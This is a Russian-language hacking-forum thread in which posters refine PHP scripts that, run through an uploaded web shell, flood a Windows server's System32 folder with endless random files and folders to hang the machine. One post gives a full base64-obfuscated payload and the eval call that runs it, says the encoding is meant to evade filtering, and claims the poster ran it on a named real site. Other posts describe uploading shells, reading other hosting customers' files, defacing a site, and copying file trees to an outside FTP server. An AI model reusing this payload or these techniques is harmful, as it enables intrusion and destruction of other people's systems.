![]() |
Php способ засорения системных папок
Хай! За ошибки не бить, я по клаве не попадаю :)
Я конечно изобрёл велосипед, но часто бывает, заливаешь шелл на апач под виндоус, а ничего сделать особо не получается, т.к. стоит файерволл и антивирус. Так вот, от нечего делать придумал как засорить через PHP систему. Всем известно, если в system32 много мусора, комп начинает жестоко виснуть, незнаю как насчёт линукса, никогда в нём не работал, и системных папок вобще незнаю в нём, но сейчас не об этом! Так вот, написал такой вот приметивный скрипт Код:
<?php for($i=0;$i<5000;$i++)Генерирует 2 числа от 1 до 99999999999999999 склеивает их, шифрует методом MD5 и создаёт в System32 папку с этим именем (32 символа) вот всё это выполняется 5000 рах! Тоесть 5000 папок в System32 это ещё не всё ;) т.к. многие админы не настраивают особо конфиги, и если скрипт неуспевает выполниться за 30 сек, тогда апач выдаёт ошибку! Поэтому после создания 5000 папок, скрипт заканчивает свою работу и перекидывает снова на эту страницу, и всё идёт заново! Тоесть 2-3 минуты работы скрипта и комп перегреется :) Кстати чтоб удалить 5000 папок надо 10 минут! Я пробовал :) Ну... Кажись всё! |
Цитата:
Цитата:
|
Цитата:
Тоже самое делал. Только скрипт создавал файлы каждую секунду, и в имени было время. PHP код:
|
Dr.Check, скрипт супер! Я просто в шоке! Но... Он создаёт раз в секунду. потому-что ты используешь time и он неможет создать с одинаковыми именами! Вот отрывок моего+твой это бомба!
PHP код:
|
Нет пончик ты не понял идею DrCheck. В хеше НАЗВАНИЯ файла должно быть time() а не в теле файла.
|
В хеше НАЗВАНИЯ файла - непонял эту фразу... В общем в название файла записывается хэш, если писать время, то...
1)Он будет моздаваться раз в минуту 2)Весь этот муор легко будет удалить, т.к. он будет сортироваться по имени из цифр, а так хэш можен начинаться как с цифр так и с букв, его протсо так не отсортируешь, ну по дате можно и по именам в 32 буквы! А в тело пишется не хеш, как ты понял (по моему) а дата, это в имя хэш пишется :D В общем за 1 минуту эта штука мне создала материала на 50МБ! :eek: ;) |
Цитата:
Цитата:
|
Также можно исползьвать ф-ю file_exists и счетчик
|
Цитата:
|
угу... один говорит, что отсортировать по числам и удалить можно. и идея перца обвиняющего не лучше - 32 символа хеш то! отсортировал по длине и не парся )))
можт проще длину динамической делать и спецсимволы добавлять? а не только мелкую латиницу и цифры, но и заглавные и подчеркивания/тире? |
Я вообще не понимаю, почему все закручено на md5. Случайные названия, состоящие из цифр и букв + случайное расширение из списка(txt dll ini exe log bmp ...)
|
Вот от этого точно никто не убежит! Набросал за 5 мин.
PHP код:
Для bul.666 : PHP код:
|
Добавте еще символов в массив name.
да и расширения можно $rash ирить =))) |
Во, добавил, то, что написал SMiX - md5(time().doubleval(microtime())) терь одинаковых имён точно небудет! Про расширения я ещё утром думал, но забыл... Щас сделаю...
PHP код:
P.S. Ах блин! Пока писал, мну опередили :o Ничё знаменитого на ачате так и не сделал, Dr.Check мож добавишь тама пару имен в копирайт, все ведь старались, да и хочется знаменитым стать :D А скрипт офигеный! Ущел жертву искать! |
Цитата:
А каких пару имен!?!?? Я сам написал. Тебе спасибо за Идею, и Смиксу за расширения. |
О! Пасибо! Терь я гордый ходить буду :D
[OFFTOP] А чё это за ошибка-то? _http://darkmoon.mediazona.ru:4001/modules/admin.php :confused: [/OFFTOP] |
Цитата:
PHP код:
Если смотреть дальше ошибку, то поймете почему =) |
Так это я шелл пытаюсь залить, щас чё нить придумаю!
Вот кстати если кому надо зашифрованый этот код в base64 это чтоб фильтрацию обойти, или ещё чего... Файлы будут создаваться в system32... Вот c2V0X3RpbWVfbGltaXQoMCk7aWdub3JlX3VzZXJfYWJvcnQoKT tlY2hvKCI8Y2VudGVyPjxoMT48Yj48Zm9udCBjb2xvcj1cImdy ZWVuXCI+Pz8/ID8/Pz8/ITwvZm9udD48L2I+PC9oMT48L2NlbnRlcj4iKTskbmFtZSA9IG FycmF5KCdhJywnYicsJ2MnLCdkJywnZScsJ2YnLCdnJywnaCcs J2knLCdqJywnaycsICAnbCcsJ20nLCduJywnbycsJ3AnLCdyJy wncycsJ3QnLCd1JywndicsJ3gnLCd5JywneicsJ0EnLCdCJywn QycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTC csJ00nLCdOJywnTycsJ1AnLCdSJywnUycsJ1QnLCdVJywnVics J1gnLCdZJywnWicsJzEnLCcyJywnMycsJzQnLCc1JywnNicsJz cnLCc4JywnOScsJzAnKTskcmFzaD0gYXJyYXkoJy50eHQnLCcu ZGljJywnLmRvYycsJy54bHMnLCcuZXhlJywnLmluaScsJy5iYX QnLCcubG9nJywnLmRsbCcsJ2hhaycsJy53bWYnLCcuemlwJywn LnJhcicsJy50YXInLCcuZ3onLCcuanBnJywnLmdpZicsJy5ibX AnKTt3aGlsZSh0cnVlKSB7JHBlcmVtID0gIiI7JGZ1Y2s9IiI7 Zm9yKCRpID0gMDsgJGkgPCByYW5kKDIwLDEpOyAkaSsrKSB7JG J5ID0gcmFuZCgwLCBjb3VudCgkbmFtZSkgLSAxKTskcGVyZW0g Lj0gJG5hbWVbJGJ5XTt9JHJhPSByYW5kKDAsIGNvdW50KCRyYX NoKS0xKTskZnVjayAuPSAkcmFzaFskcmFdOyRmcD1mb3Blbigk cGVyZW0uJGZ1Y2ssInciKTtmd3JpdGUoJGZwLHBocF91bmFtZS gpKTtmY2xvc2UoJGZwKTt9 (пробелы убрать) Это можно выполнить так: eval(base64_decode('ТУТ_ЭТОТ_КОД')); :) Всё, запустил эту штуку на _http://darkmoon.mediazona.ru:4001 :D |
пару лет назад нашел небольшой прикол на хостерах. Админы от нечего делать всех своих клиентов писали в одну группу пользователей. таким образом я имел доступ на read к любому юзверю хостера, поимев шелл на одном из них. Я описывал эту багу в ][ на примере небольшого "дефа" glukoza.ru (добавил пару новостей, изменил немного фотоальбом). В общем не суть. тогда я написал скрипт который "листает" все диры и файлы с указанного места и копирует полную структуру на указанный ftp. Скрипт умещался в 20 строк.
Я к тому, что если файлы писать не только в system32, а листать все дерево каталогов на жестком диске и писать везде - будет еще страшнее =) |
Уй позорище какое. Что ни скрипт, то позорище!
Щас меня убивать будут |
А зачем вообще в именах расширения добавлять. если хотите просто подвесить систему и создать дофига файлов, можно обойтись парой строк. На фиг выдумывать, мудрить что-то.
PHP код:
|
Повесить систему, это одно, а красиво всё зафлудить чтоб комп всегда висел а админ ничё непонимал, это другое =) Кста что твой скриптик делает-то?
|
uniqid() - возвращает уникальный идентификатор, основанный на текущем времени в микросекундах.
Туфта имхо. |
Ребят вы уж извините, но пошел откровенный флуд. клозед.
|
| Время: 14:11 |